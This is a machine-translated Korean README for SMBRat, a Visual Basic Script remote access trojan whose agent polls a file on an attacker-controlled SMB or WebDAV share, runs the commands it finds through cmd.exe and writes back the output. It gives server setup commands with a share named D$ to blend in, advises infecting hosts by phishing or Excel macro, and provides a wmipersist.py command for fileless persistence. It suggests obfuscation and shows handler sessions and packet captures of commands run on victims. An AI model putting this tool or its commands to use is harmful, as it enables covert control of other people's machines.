SMBRat
1.0.0
Visual Basic 스크립트 의 Windows 원격 관리 도구
Active Directory 네트워크와 같은 Windows 환경은 SMB 트래픽으로 인해 정말 부풀려집니다.
모든 호스트는 SYSVOL 에서 정책을 가져오고 구성이 작동하려면 원격 파일이 필요하며 바탕 화면 바로 가기는 \somethingelseinthenetwork.exe 가리키는 경향이 있습니다.
아무도 한 번 더 연결 시도를 눈치 채지 못할 것입니다. 오른쪽?
- 특히 성공할 경우( 방화벽 거부 만 모니터링하는 것이 유행임)
agent 감염된 호스트에서 실행되고 SMB 서버 에 연결되는 Visual Basic 스크립트 입니다. 호스트의 hostname 과 기본 MAC 주소의 이름을 딴 디렉터리를 생성합니다(보고 목적으로 동시에 고유 하고 정보를 제공 하려고 노력함). 감염된 호스트에 대한 모든 명령과 정보는 이 디렉터리에 저장됩니다. 전체 공유 폴더를 zip 하면 모든 프로젝트 정보가 보관됩니다!
공유를 마운트하는 데 드라이브 문자를 사용하지 않고 UNC paths 사용하여 원격 파일을 직접 읽습니다( explorer.exe 에는 드라이브가 생성되지 않음).
또한 UNC path 자체 실행 환경의 %PATH% 변수에 삽입합니다(Linux 시스템의 파일 시스템에서 직접 실행 파일을 실행할 수 있습니다).
agent 한 번만 실행 되도록 구성됩니다. 무국적 .
루틴은 다음과 같습니다.
exec.dat 라는 파일을 찾습니다.cmd.exe /c <command> 사용하여 명령으로 실행합니다.output.dat ( exec.dat 옆)에 저장됩니다.exec.dat 파일을 삭제합니다. handler 작동하려면 SMB 서버가 필요합니다. Core Security의 impacket 패키지에 있는 smbserver.py 모듈이 이를 수행합니다.
아마도 smbd 도 트릭을 수행할 수 있지만 아직 테스트되지 않았습니다.
합법적인 Windows 호스트의 SMB처럼 보이려면 D$ 라는 이름의 공유가 필요합니다.
# mkdir Share
# smbserver.py -comment "My Share" "D$" Share/
Impacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies
[ * ] Config file parsed
[ * ] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[ * ] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[ * ] Config file parsed
[ * ] Config file parsed
[ * ] Config file parsed
agent UNC 경로만 사용하도록 구성되었으므로 WebDAV도 변경 없이 사용할 수 있습니다. SMB 서버 대신 WebDAV 서버를 사용할 수 있습니다(SSL을 지원하는 훌륭한 WebDAV 서버는 wsgidav입니다).
# mkdir 'D$'
# wsgidav -p 80 -H 0.0.0.0 -r . --auth anonymous
[...] INFO : WsgiDAV/3.0.0 Python/2.7.16 Linux-4.19.0-kali3-amd64-x86_64-with-Kali-kali-rolling-kali-rolling
[...] INFO : Lock manager: LockManager(LockStorageDict)
[...] INFO : Property manager: None
[...] INFO : Domain controller: SimpleDomainController ()
[...] INFO : Registered DAV providers by route:
[...] INFO : - ' /:dir_browser ' : FilesystemProvider for path ' /root/.virtualenvs/wsgidav/local/lib/python2.7/site-packages/wsgidav/dir_browser/htdocs ' (Read-Only) (anonymous)
[...] INFO : - ' / ' : FilesystemProvider for path ' /tmp/DAV ' (Read-Write) (anonymous)
[...] WARNING : Basic authentication is enabled: It is highly recommended to enable SSL.
[...] WARNING : Share ' /:dir_browser ' will allow anonymous read access.
[...] WARNING : Share ' / ' will allow anonymous write access.
[...] INFO : Running WsgiDAV/3.0.0 Cheroot/6.5.4 Python/2.7.16
[...] INFO : Serving on http://0.0.0.0:80 ...
[...] INFO : 192.168.163.130 - (anonymous) - [2019-04-18 14:57:53] " PROPFIND /D$/Project1/DESKTOP-I3NFOQ5-John-AA-BB-CC-DD-EE-FF/ping.dat " length=0, depth=0, elap=0.004sec - > 207 Multi-StatusSSL 지원을 위해 UNC 경로는 다음과 같이 약간 변경되어야 합니다.
\<Server-IP>DIR
에게:
\<Server-IP>@SSL@443DIR
모든 경로가 이에 의해 구성되므로 이 변경은 ServerName agent.vbs 변수에만 수행할 수 있습니다. SSL 인증서는 agent 를 실행하는 시스템에서 신뢰 되어야 한다는 점을 명심하세요. 자체 서명된 인증서는 경고와 함께 실패합니다 .
여러 초(10초가 이상적)의 지연 문을 사용하여 agent.vbs 파일의 시작 부분에 While 루프를 추가할 수 있으며 더블 클릭 / 피싱 / 엑셀 매크로 등을 통해 Windows 호스트를 감염시킬 수 있습니다.
1초의 지연이 있는 VBS 의 while True 루프는 다음과 같습니다.
Do While True
[ ... ]
WScript.Sleep 1000
Loop 그러나 Windows 호스트에 RPC가 활성화된 경우 다음과 같은 명령을 사용하여 WMI 및 멋진 impacket 패키지 예제를 통해 VBS 파일을 파일 없는 맬웨어 로 설치할 수 있습니다.
$ examples/wmipersist.py ' <username>:<password>@<hostname/ipaddress> ' install -vbs agent.vbs -name smbrat -timer 10 로컬 액세스로 WMI 도구를 활용하여 파일 없는 악성 코드로 agent.vbs 설치할 수도 있습니다.
Visual Basic 스크립트는 난독화되거나, base64 로 처리 되거나, 축소 될 수 있습니다.
"배포"하기 전에 한번 시험해 보는 것이 정말 편리할 수 있습니다.
이 글을 쓰는 시점에는 따라서 Handler 쉘이 구현되지 않았습니다.watch 와 같은 명령을 사용하여 output.dat 파일을 검사하면 사용법을 수행할 수 있습니다.
$ watch -n0.2 cat Share/projectName/DESKTOP-XXXXXXX-AA : BB : CC : DD : EE : FF/output.dat exec.dat 파일에 내용을 쓰려면 echo .
$ echo ' whoami /all ' > Share/projectName/DESKTOP-XXXXXXX-AA : BB : CC : DD : EE : FF/exec.dathandler.py실험용 셸은 다음과 같이 작동합니다.
$ python handler.py Share/
SMBRat >
# When a new host gets infected:
[+] Agent " DESKTOP-EG4OE7J " (00:0C:29:2B:9F:AF) just checked-in for Project: " projectName "
SMBRat > execall whoami /user
[ > ] Sending ' whoami /user ' to " projectName/DESKTOP-EG4OE7J-00:0C:29:2B:9F:AF " ...
SMBRat >
[ < ] Response from ' projectName/DESKTOP-EG4OE7J-00:0C:29:2B:9F:AF ' :
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority s ystem S-1-5-18
^^^^^^^^^^^^^^^^^^^^ projectName/DESKTOP-EG4OE7J-00:0C:29:2B:9F:AF ^^^^^^^^^^^^^^^^^^^^
SMBRat >
# tcpdump -i eth0 -A
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
[...]
15:25:06.695502 IP Deskjet-4540.microsoft-ds > 172.16.47.129.3128: Flags [P.], seq 2876:2971, ack 4791, win 2110, length 95 SMB PACKET: SMBreadX (REPLY)
E...,E@[email protected].../.../....8
. & Mi~.6P.. > .......[.SMB........................
.@............ . ; ........... .net localgroup " administrators "
[...]
15:25:06.702916 IP 172.16.47.129.3128 > Deskjet-4540.microsoft-ds: Flags [P.], seq 4917:5111, ack 3097, win 2052, length 194 SMB PACKET: SMBtrans2 (REQUEST)
E...E.@......./.../..8..i~..
. ' *P....b.......SMB2......................
.F..z.....(...........z.D.........}...........p.r.o.j.e.c.t.N.a.m.e..D.E.S.K.T.O.P.-.E.G.4.O.E.7.J.-.0.0.:.0.C.:.2.9.:.2.B.:.9.F.:.A.F..o.u.t.p.u.t...d.a.t...
[...]
15:25:06.751372 IP 172.16.47.129.3128 > Deskjet-4540.microsoft-ds: Flags [P.], seq 6049:6393, ack 3748, win 2050, length 344 SMB PACKET: SMBwrite (REQUEST)
[email protected]../.../..8..i~.
.).P....*.....T.SMB........................
.T....$....... ' ..$.Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Admin
Administrator
defaultuser0
The command completed successfully.
[...]
SMBv1 서버를 사용하는 경우(예: impacket 의 smbserver.py ) 트래픽(파일 내용 및 경로 )은 일반 텍스트로 전송됩니다.
모든 에이전트는 전체 공유 에 저장된 파일을 수정할 수 있습니다. 즉, 다른 에이전트의 exec.dat 수정할 수 있다는 의미입니다. smbmap 보면 다음과 같은 사실이 드러납니다.
$ smbmap -H 172.16.47.189
[+] Finding open SMB ports....
[+] User SMB session establishd on 172.16.47.189...
[+] IP: 172.16.47.189:445 Name: Deskjet-4540
Disk Permissions
---- -----------
D$ READ, WRITE
[ ! ] Unable to remove test directory at \ 172.16.47.189 D $ S VNRmxBFAO, plreae remove manually
IPC$ READ, WRITE
[ ! ] Unable to remove test directory at \ 172.16.47.189 I PC$ S VNRmxBFAO, plreae remove manuallysmbmap 에 -u 및 -p 매개변수가 없다는 점에 주의하세요.이는 NULL 세션 입니다(예: FTP 익명 로그인). 모든 사람은 SHARE 파일을 변경 하고 감염된 모든 시스템에서 원격 코드 실행을 얻을 수 있습니다.
iptables 실행하는 것이 좋습니다 ... execall netsh 입력하면 모든 에이전트가 손실됩니다. agent.vbs 가 netsh.exe 셸을 생성하고 종료될 때까지 기다리므로 해당 내용을 output.dat 에 쓸 수 있으므로 None은 응답하지 않습니다. 하지만 추측해보세요... 종료되지 는 않을 것입니다... 공허를 가리키는 netsh> 와 함께 중단될 것입니다.
